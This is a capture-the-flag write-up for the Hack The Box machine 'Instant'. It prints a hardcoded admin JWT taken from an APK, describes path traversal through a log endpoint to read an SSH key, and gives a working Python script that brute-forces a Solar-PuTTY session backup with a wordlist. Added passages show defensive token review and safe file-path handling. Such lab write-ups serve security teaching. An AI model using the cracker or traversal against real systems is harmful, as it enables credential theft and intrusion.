Instant (HTB)
I said NOW.
Intro.
Hi fellows, today we have yet another HTB season machine. Let's get right into it.
Enumeration.
Port scan.
```
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMM6fK04LJ4jNNL950Ft7YHPO9NKONYVCbau/+tQKoy3u7J9d8xw2sJaajQGLqTvyWMolbN3fKzp7t/s/ZMiZNo=
|   256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL+zjgyGvnf4lMAlvdgVHlwHd+/U4NcThn1bx5/4DZYY
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.58
|_http-title: Instant Wallet
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.58 (Ubuntu)
```
So, classic: we have HTTP and SSH.
Let's enumerate HTTP.
After a long time of enumeration, including fuzzing, subdomain enumeration and directory searching, it turned out to be much simpler. The first thing that came to mind when I visited the website was to download the file it offers; it was an .apk file.
I thought the main objective must be in there, so I decompressed the files.

At first glance I thought there was nothing in here, just a rabbit hole, so I went back to the website and did all the enumeration again with no luck. Then I went to the official discussion (https://forum.hackthebox.com/t/official-instant-discussion/327960), where one of the people said to search more in the APK file. That's what I did, and I found what I was looking for.

Two subdomains exist under res/xml/network_security_config.xml.
I then spent some time testing different username/password combinations, trying to get access to the admin endpoints.

So I thought the code must contain some credentials for accessing these endpoints, and I started searching for creds. I did not find any 🤡. But what did I find?
Path traversal
```
eyJhbGciOiJIUzI1NiIsInR5c.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA
```
This was a bearer token, i.e. a JWT (JSON Web Token).
I thought it might have expired, but I tried it anyway.
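Rather than trying a token found in a shipped client against the server, the question of whether it has expired can be answered offline: the payload segment of a JWT is only base64url-encoded JSON. The following is an added example, not part of the original write-up, that decodes the payload of the token above (the header segment as printed in the write-up is truncated, so only the payload is parsed) and summarises what a reviewer would flag about it; the `max_lifetime` threshold is an assumed review policy, not something from the machine.

```python
import base64
import json
from datetime import datetime, timedelta, timezone

# Token recovered from the APK, copied from the write-up above.
APK_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5c."
    "eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0w"
    "MTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ."
    "v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"
)


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def jwt_payload(token: str) -> dict:
    """Return the claims of a JWT without verifying its signature.

    This is inspection only: nothing here trusts the token, it just reads
    what the issuer put into it so the claims can be reviewed.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    return json.loads(b64url_decode(parts[1]))


def review_token(token: str, max_lifetime: timedelta = timedelta(days=1)) -> dict:
    """Summarise the review-relevant facts about a token embedded in a client.

    max_lifetime is an assumed policy value: any token valid for longer than
    this is reported, since a token baked into an app cannot be rotated.
    """
    claims = jwt_payload(token)
    findings = []
    expires = None
    if "exp" not in claims:
        findings.append("no expiry claim")
    else:
        expires = datetime.fromtimestamp(claims["exp"], tz=timezone.utc)
        remaining = expires - datetime.now(tz=timezone.utc)
        if remaining > max_lifetime:
            findings.append(
                f"expires in {remaining.days} days, more than the allowed "
                f"{max_lifetime.days}"
            )
    if str(claims.get("role", "")).lower() == "admin":
        findings.append("privileged role embedded in a shipped client")
    return {"claims": claims, "expires": expires, "findings": findings}


if __name__ == "__main__":
    report = review_token(APK_TOKEN)
    print("claims :", report["claims"])
    print("expires:", report["expires"])
    for finding in report["findings"]:
        print("finding:", finding)
```

The decoded `exp` places the expiry in the year 3023, which is why the token still works: it is effectively a permanent admin credential shipped to every user of the app.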


After I got the admin token I started looking around, and the most interesting things were the logs and the users. The users endpoint only contains users, sure, but the logs endpoint lists log files for the application's endpoints.

Let's first see the available logs and then try to read them.

We can see the file name and the path the files live in, so let's read it.

The most important thing in this image is that the endpoint takes the file name from a query parameter. Could it be LFI or path traversal?
Emphasizing the Difference between LFI and Path Traversal
Local File Inclusion (LFI) occurs when an application improperly handles user input for file inclusion. Typically, this happens when an application accepts a file path from the user to include or display within a webpage, but does not properly restrict or validate the path. In this scenario, attackers can specify any file path on the server, causing the application to load and sometimes execute files from anywhere on the system. In PHP, for example, functions like `include` and `require` are often at risk if used insecurely.
Path Traversal, also known as Directory Traversal, is similar to LFI but has a different focus. Here, instead of including files into the application, the attacker tries to directly access restricted files by manipulating the file path. By using traversal sequences (like `../`), attackers can navigate to directories outside the intended file path and access sensitive files that weren't meant to be exposed.
So I tried both, and the one that worked was path traversal.
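The log endpoint's flaw is the classic one: a user-supplied file name is joined onto a directory with no check that the result stays inside it. The following is an added example, not code from the machine or the write-up, that shows the vulnerable read beside a hardened one; the sandbox layout (`logs/app.log` as the intended directory, `outside.txt` standing in for a file that must stay private) is constructed for the demonstration.

```python
import os
import tempfile
from pathlib import Path


def build_sandbox() -> tuple:
    """Constructed layout: <tmp>/logs/ is the directory the endpoint is meant
    to serve from; <tmp>/outside.txt stands in for a file outside it."""
    root = Path(tempfile.mkdtemp())
    logs = root / "logs"
    logs.mkdir()
    (logs / "app.log").write_text("2024-01-01 app started\n")
    (root / "outside.txt").write_text("not a log\n")
    return str(logs), str(root / "outside.txt")


def read_log_unsafe(log_dir: str, name: str) -> str:
    """The pattern behind the finding: the name is joined straight onto the
    log directory. '../' walks out of it, and an absolute name makes
    os.path.join drop log_dir entirely."""
    with open(os.path.join(log_dir, name)) as f:
        return f.read()


def read_log_safe(log_dir: str, name: str) -> str:
    """Canonicalise both sides, then require the target to sit under log_dir.
    resolve() also follows symlinks, so a link planted inside the directory
    cannot point back out of it."""
    base = Path(log_dir).resolve()
    target = (base / name).resolve()
    if base != target and base not in target.parents:
        raise PermissionError(f"{name!r} escapes {base}")
    if not target.is_file():
        raise FileNotFoundError(name)
    return target.read_text()


if __name__ == "__main__":
    logs, outside = build_sandbox()
    print("safe, valid name  :", read_log_safe(logs, "app.log").strip())
    print("unsafe, traversal :", read_log_unsafe(logs, "../outside.txt").strip())
    print("unsafe, absolute  :", read_log_unsafe(logs, outside).strip())
    for bad in ("../outside.txt", outside):
        try:
            read_log_safe(logs, bad)
        except PermissionError as err:
            print("safe, rejected    :", err)
```

The check compares resolved paths rather than looking for `../` in the string, so encoded or doubled traversal sequences, and absolute paths, are all handled by the same rule: the final location must be inside the directory.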


Shell as shirohige.

With all this information we could access her SSH key.

The pain was in cleaning up this SSH key, but we did it.


Shell as Root.
From there I just did some basic enumeration and found a Solar-PuTTY session file in the /opt directory.

With a bit more searching I found that this could be crackable, thanks to https://xtromera.github.io/.
I was able to crack it using the following Python code.
```python
import base64
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.ciphers import Cipher, modes
from cryptography.hazmat.backends import default_backend
try:
    # cryptography >= 43 moved 3DES into the "decrepit" namespace
    from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
except ImportError:
    from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES


def decrypt(passphrase, ciphertext):
    try:
        # Decode the base64 encoded ciphertext
        array = base64.b64decode(ciphertext)
        # Layout of the sessions backup: 24-byte salt, 8-byte IV,
        # encrypted payload from offset 48
        salt = array[:24]
        iv = array[24:32]
        encrypted_data = array[48:]
        # Derive the key from the passphrase using PBKDF2
        kdf = PBKDF2HMAC(
            algorithm=hashes.SHA1(),
            length=24,  # Triple DES key size
            salt=salt,
            iterations=1000,
            backend=default_backend()
        )
        key = kdf.derive(passphrase.encode())
        # Create the cipher and decrypt the data
        cipher = Cipher(TripleDES(key), modes.CBC(iv), backend=default_backend())
        decryptor = cipher.decryptor()
        decrypted_data = decryptor.update(encrypted_data) + decryptor.finalize()
        # A wrong passphrase yields garbage; keep only ASCII so the
        # 'Credentials' marker check below is meaningful
        data = ''.join(chr(c) for c in decrypted_data if chr(c).isascii())
        return data
    except Exception as e:
        print(f'Error: {e}')
        # Return an empty string so the caller's membership test still works
        return ''


with open('./sessions-backup.dat') as f:
    cipher = f.read()

# rockyou.txt is not valid UTF-8 throughout; latin-1 maps every byte
with open('../../Downloads/rockyou.txt', encoding='latin-1') as passwords:
    for i, password in enumerate(passwords):
        password = password.strip()
        decrypted = decrypt(password, cipher)
        print(f'[{i}] {password=}', end='\r')
        if 'Credentials' in decrypted:
            print('\r', i, password)
            print()
            print(decrypted)
            break
```

It turned out to give us the root password; now we just need to log in as root.

Ending.
In the end, this machine was one of the best machines I have ever played, thanks to its ideas: from the initial access to root, everything was new. Great work from HTB, actually.